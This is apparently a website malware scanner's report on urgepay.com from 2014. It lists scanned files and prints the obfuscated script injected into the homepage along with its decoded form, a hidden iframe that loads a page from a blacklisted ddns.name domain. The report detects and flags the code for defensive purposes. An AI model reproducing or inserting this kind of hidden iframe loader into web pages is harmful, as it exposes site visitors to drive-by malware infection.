Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urgepay.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://urgepay.com/ | 200 OK Content-Length: 18129 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: javlprni.ddns.name i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c ...[1599 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://urgepay.com/js/css3-mediaqueries.js | 200 OK Content-Length: 16017 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.backgroundPosition.js | 200 OK Content-Length: 1218 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.equalize.js | 200 OK Content-Length: 602 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.cycle.lite.min.js | 200 OK Content-Length: 3565 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.pngFix.pack.js | 200 OK Content-Length: 2485 Content-Type: application/javascript | clean |
http://urgepay.com/js/custom.js | 200 OK Content-Length: 879 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.prettyPhoto.js | 200 OK Content-Length: 24867 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.form.2.67.js | 200 OK Content-Length: 23740 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://urgepay.com/js/jquery.validate.js | 200 OK Content-Length: 37527 Content-Type: application/javascript | clean |
http://urgepay.com/js/paralax.js | 200 OK Content-Length: 7792 Content-Type: application/javascript | clean |
http://urgepay.com/js/common.js | 200 OK Content-Length: 2889 Content-Type: application/javascript | clean |
http://urgepay.com/index.html | 200 OK Content-Length: 18129 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: javlprni.ddns.name i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c ...[1599 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urgepay.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 20:34:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 18129
Content-Type: text/html
Last-Modified: Thu, 17 Nov 2011 23:52:00 GMT
...18129 bytes of data.
GET / HTTP/1.1
Host: urgepay.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 20:34:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 18129
Content-Type: text/html
Last-Modified: Thu, 17 Nov 2011 23:52:00 GMT
...18129 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: urgepay.com
Referer: http://www.google.com/search?q=urgepay.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: urgepay.com
Referer: http://www.google.com/search?q=urgepay.com
Result:
The result is similar to the first query. There are no suspicious redirects found.